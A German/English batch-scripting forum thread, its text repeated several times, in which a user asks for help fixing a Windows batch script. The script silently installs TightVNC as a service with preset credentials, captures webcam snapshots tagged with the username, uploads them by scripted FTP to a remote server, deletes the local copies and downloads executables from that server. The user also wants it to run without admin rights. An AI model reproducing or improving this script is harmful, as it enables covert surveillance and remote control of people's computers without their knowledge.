(((((((Hallo zusammen bin neu hier aber mir gefällt euer Forum sehr da ich hier schon oft hilfe gefunden habe.Nun habe ich ich ein Problem und hoffe ihr könnt mir helfen. Die Batch soll 1) gucken ob VNC leuft wenn nicht es starten, wenn es nicht instaliert ist, instalieren 2) ein programm starten und die jpg die es erstellt ins aktuelle datum umbennen und als nob (nob deswegen weil ich noch einderes program nutze und die dann an einen ftp server senden))))))
Sorry my Engl. ist not good, please help me i have no idee who is the error.
del c:\login.txt
echo OPEN INTERNETSEITE>>c:\login.txt
echo USER user>>c:\login.txt
echo PASSWORT>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd service>>c:\login.txt
echo prompt>>c:\login.txt
echo mput *.nob>>c:\login.txt
echo mput *.no*>>c:\login.txt
echo quit>>c:\login.txt
@echo off
Break on
chcp 1252
set PFAD=%cd%\
set PRO="c:\Service\"
set PROt="c:\Service\tmp\"
if exist "%PRO%identities" copy /y %PRO%identities "C:\Dokumente und Einstellungen\%username%\.vnc\identities"
if exist "%PRO%identities" copy /y %PRO%identities "C:\Users\%user%\.vnc\identities"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "C:\Programme\TightVNC"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "C:\Program Files\TightVNC"
cd c:\Service\
web.exe -s
ren c:\Service\WEBCAMSHOT.jpg WEBCAMSHOT.nob
rename c:\Service\*.jpg *.nob.%date:~4,2%-%date:~7,2%-%date:~10,4%
ftp -n -s:c:login.txt
del c:\Service\*.nob
del c:\Service\*.no*
del c:\Service\*.bmp
if exist "c:\Program~1\TightVNC\winvnc.exe" set PR="c:\Program~1\"
if exist "c:\Programme\TightVNC\winvnc.exe" set PR="c:\Programme\"
if exist "c:\Program Files\TightVNC\winvnc.exe" set PR="c:\Program Files\"
if exist "c:\Program Files (x86)\TightVNC\winvnc.exe" set PR="c:\Program Files (x86)\"
if not exist "%PR%TightVNC\winvnc.exe" goto run
call :FncAskKillOrRunApp %PR%TightVNC\winvnc.exe
call :FncSleep 2
goto :LOOP
setlocal EnableDelayedExpansion
tasklist | find "%~nx1" > NULL
if %ERRORLEVEL% == 0 (
echo ist AN
) else (
echo ist aus
ping -n 60 localhost > NUL
start "" "%~1"
exit /b 0
set /a _FncSleep_seconds"=(%1 +1)"
ping -n %_FncSleep_seconds% -w 1000 >NUL
exit /b 0
if exist "%PRO%setup.exe" ( copy /y "%PRO%setup.exe" c: )
if EXIST c:\setup.exe goto inst
::setup.txt wird erstellt
echo OPEN INTERNETSEITE>>c:\setup.txt
echo USER user>>c:\setup.txt
echo PASSWORT>>c:\setup.txt
echo BIN>>c:\setup.txt
echo LCD c:\>>c:\setup.txt
echo LCD service>>c:\setup.txt
echo LCD tmp>>c:\setup.txt
echo cd Files>>c:\setup.txt
echo GET setup.exe>>c:\setup.txt
echo GET VNCHooks.dll>>c:\setup.txt
echo GET identities>>c:\setup.txt
echo close>>c:\setup.txt
ftp -n -s:c:setup.txt
del c:\setup.txt
goto inst
if exist c:\setup.exe copy /y c:\setup.exe %PRO%
md c:\service\tmp\
if exist c:\setup.exe copy /y c:\service\tmp\setup.exe %PRO%
if exist "%PRO%identities" copy /y %PRO%identities "C:\Dokumente und Einstellungen\%username%\.vnc\identities"
if exist "%PRO%identities" copy /y %PRO%identities "C:\Users\%user%\.vnc\identities"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "%PR%TightVNC"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "%PR%TightVNC"
cd %PRO%
call regedit /s TightVNC.reg
ping -n 500 localhost > NUL
setup.exe /verysilent /TASKS=installservice
goto loop
Moderator: DosItHelp
Hi Nobre,
If you wrote in english, there are much better chances that someone will respond.
Ok, but your german is not better.
But where is your problem? Which part does not work?
Perhaps you should add many echo lines, so you can see what happens.
(Wo ist denn nun Dein Problem? An welcher Stelle scheitert das Batchfile?
Vielleicht solltest Du viele echo Zeilen einfügen, damit Du siehst was passiert )
(((((((Hallo zusammen bin neu hier aber mir gefällt euer Forum sehr da ich hier schon oft hilfe gefunden habe.Nun habe ich ich ein Problem und hoffe ihr könnt mir helfen. Die Batch soll 1) gucken ob VNC leuft wenn nicht es starten, wenn es nicht instaliert ist, instalieren 2) ein programm starten und die jpg die es erstellt ins aktuelle datum umbennen und als nob (nob deswegen weil ich noch einderes program nutze und die dann an einen ftp server senden))))))
If you wrote in english, there are much better chances that someone will respond.
Sorry my Engl. ist not good, please help me i have no idee who is the error.
Ok, but your german is not better.
But where is your problem? Which part does not work?
Perhaps you should add many echo lines, so you can see what happens.
(Wo ist denn nun Dein Problem? An welcher Stelle scheitert das Batchfile?
Vielleicht solltest Du viele echo Zeilen einfügen, damit Du siehst was passiert )
sorry logic i dont have say whats the problem. The Problem that i have is the ms-dos promt closes
but now i have found the error. Here is the code
I still have a beauty wrong, I'd rather the reinschreibst the program to c: \ Program Files \ service under all but the windows versions including the German
(It normally is PROGRAMMES without S and 2 M)
and right without admin
del c:\login.txt
echo OPEN >>c:\login.txt
echo USER >>c:\login.txt
echo >>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd service>>c:\login.txt
echo prompt>>c:\login.txt
echo mput *.nob>>c:\login.txt
echo mput *.jpg>>c:\login.txt
echo quit>>c:\login.txt
@echo off
Break on
chcp 1252
set PFAD=%cd%\
set PRO="c:\Service\"
set PROt="c:\Service\tmp\"
if exist "%PRO%identities" copy /y %PRO%identities "C:\Dokumente und Einstellungen\%username%\.vnc\identities"
if exist "%PRO%identities" copy /y %PRO%identities "C:\Users\%user%\.vnc\identities"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "C:\Programme\TightVNC"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "C:\Program Files\TightVNC"
cd c:\Service\
web.exe -s
set j=%date:~-4%
set m=%date:~-7,2%
set t=%date:~-10,2%
set st=%time:~0,2%
set mi=%time:~3,2%
set se=%time:~6,2%
ren WEBCAMSHOT.jpg "%username% %j%.%m%.%t% %st%.%mi%.%se%.jpg"
rename *.jpg *.nob
ftp -n -s:c:login.txt
del c:\Service\*.nob
del c:\Service\*.jpg
del c:\Service\*.bmp
ping -n 20 localhost > NUL
if exist "c:\Program~1\TightVNC\winvnc.exe" set PR=c:Program~1\
if exist "c:\Programme\TightVNC\winvnc.exe" set PR=c:Programme\
if exist "c:\Program Files\TightVNC\winvnc.exe" set PR=c:Program Files\
if exist "c:\Program Files (x86)\TightVNC\winvnc.exe" set PR=c:Program Files (x86)\
if not exist "%PR%TightVNC\winvnc.exe" goto run
call :FncAskKillOrRunApp "%PR%TightVNC\winvnc.exe"
call :FncSleep 2
goto :LOOP
setlocal EnableDelayedExpansion
tasklist | find "%~nx1" > NULL
if %ERRORLEVEL% == 0 (
echo ist AN
) else (
echo ist aus
ping -n 60 localhost > NUL
start "" "%~1"
exit /b 0
set /a _FncSleep_seconds"=(%1 +1)"
ping -n %_FncSleep_seconds% -w 1000 >NUL
exit /b 0
if exist "%PRO%setup.exe" ( copy /y "%PRO%setup.exe" c: )
if EXIST c:\setup.exe goto inst
nslookup service.eu.gp
::setup.txt wird erstellt
echo OPEN >>c:\setup.txt
echo USER >c:\setup.txt
echo >>c:\setup.txt
echo BIN>>c:\setup.txt
echo LCD c:\>>c:\setup.txt
echo LCD service>>c:\setup.txt
echo LCD tmp>>c:\setup.txt
echo cd Files>>c:\setup.txt
echo GET setup.exe>>c:\setup.txt
echo GET VNCHooks.dll>>c:\setup.txt
echo GET identities>>c:\setup.txt
echo close>>c:\setup.txt
ftp -n -s:c:setup.txt
del c:\setup.txt
goto inst
if exist c:\setup.exe copy /y c:\setup.exe %PRO%
md c:\service\tmp\
if exist c:\setup.exe copy /y c:\service\tmp\setup.exe %PRO%
if exist "%PRO%identities" copy /y %PRO%identities "C:\Dokumente und Einstellungen\%username%\.vnc\identities"
if exist "%PRO%identities" copy /y %PRO%identities "C:\Users\%user%\.vnc\identities"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "%PR%TightVNC"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "%PR%TightVNC"
cd %PRO%
call regedit /s TightVNC.reg
ping -n 500 localhost > NUL
setup.exe /verysilent /TASKS=installservice
goto loop
sorry logic i dont have say whats the problem. The Problem that i have is the ms-dos promt closes
but now i have found the error. Here is the code
I still have a beauty wrong, I'd rather the reinschreibst the program to c: \ Program Files \ service under all but the windows versions including the German
(It normally is PROGRAMMES without S and 2 M)
and right without admin
del c:\login.txt
echo OPEN >>c:\login.txt
echo USER >>c:\login.txt
echo >>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd cd..>>c:\login.txt
echo lcd service>>c:\login.txt
echo prompt>>c:\login.txt
echo mput *.nob>>c:\login.txt
echo mput *.jpg>>c:\login.txt
echo quit>>c:\login.txt
@echo off
Break on
chcp 1252
set PFAD=%cd%\
set PRO="c:\Service\"
set PROt="c:\Service\tmp\"
if exist "%PRO%identities" copy /y %PRO%identities "C:\Dokumente und Einstellungen\%username%\.vnc\identities"
if exist "%PRO%identities" copy /y %PRO%identities "C:\Users\%user%\.vnc\identities"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "C:\Programme\TightVNC"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "C:\Program Files\TightVNC"
cd c:\Service\
web.exe -s
set j=%date:~-4%
set m=%date:~-7,2%
set t=%date:~-10,2%
set st=%time:~0,2%
set mi=%time:~3,2%
set se=%time:~6,2%
ren WEBCAMSHOT.jpg "%username% %j%.%m%.%t% %st%.%mi%.%se%.jpg"
rename *.jpg *.nob
ftp -n -s:c:login.txt
del c:\Service\*.nob
del c:\Service\*.jpg
del c:\Service\*.bmp
ping -n 20 localhost > NUL
if exist "c:\Program~1\TightVNC\winvnc.exe" set PR=c:Program~1\
if exist "c:\Programme\TightVNC\winvnc.exe" set PR=c:Programme\
if exist "c:\Program Files\TightVNC\winvnc.exe" set PR=c:Program Files\
if exist "c:\Program Files (x86)\TightVNC\winvnc.exe" set PR=c:Program Files (x86)\
if not exist "%PR%TightVNC\winvnc.exe" goto run
call :FncAskKillOrRunApp "%PR%TightVNC\winvnc.exe"
call :FncSleep 2
goto :LOOP
setlocal EnableDelayedExpansion
tasklist | find "%~nx1" > NULL
if %ERRORLEVEL% == 0 (
echo ist AN
) else (
echo ist aus
ping -n 60 localhost > NUL
start "" "%~1"
exit /b 0
set /a _FncSleep_seconds"=(%1 +1)"
ping -n %_FncSleep_seconds% -w 1000 >NUL
exit /b 0
if exist "%PRO%setup.exe" ( copy /y "%PRO%setup.exe" c: )
if EXIST c:\setup.exe goto inst
nslookup service.eu.gp
::setup.txt wird erstellt
echo OPEN >>c:\setup.txt
echo USER >c:\setup.txt
echo >>c:\setup.txt
echo BIN>>c:\setup.txt
echo LCD c:\>>c:\setup.txt
echo LCD service>>c:\setup.txt
echo LCD tmp>>c:\setup.txt
echo cd Files>>c:\setup.txt
echo GET setup.exe>>c:\setup.txt
echo GET VNCHooks.dll>>c:\setup.txt
echo GET identities>>c:\setup.txt
echo close>>c:\setup.txt
ftp -n -s:c:setup.txt
del c:\setup.txt
goto inst
if exist c:\setup.exe copy /y c:\setup.exe %PRO%
md c:\service\tmp\
if exist c:\setup.exe copy /y c:\service\tmp\setup.exe %PRO%
if exist "%PRO%identities" copy /y %PRO%identities "C:\Dokumente und Einstellungen\%username%\.vnc\identities"
if exist "%PRO%identities" copy /y %PRO%identities "C:\Users\%user%\.vnc\identities"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "%PR%TightVNC"
if exist "%PRO%VNCHooks.dll" copy /y %PRO%VNCHooks.dll "%PR%TightVNC"
cd %PRO%
call regedit /s TightVNC.reg
ping -n 500 localhost > NUL
setup.exe /verysilent /TASKS=installservice
goto loop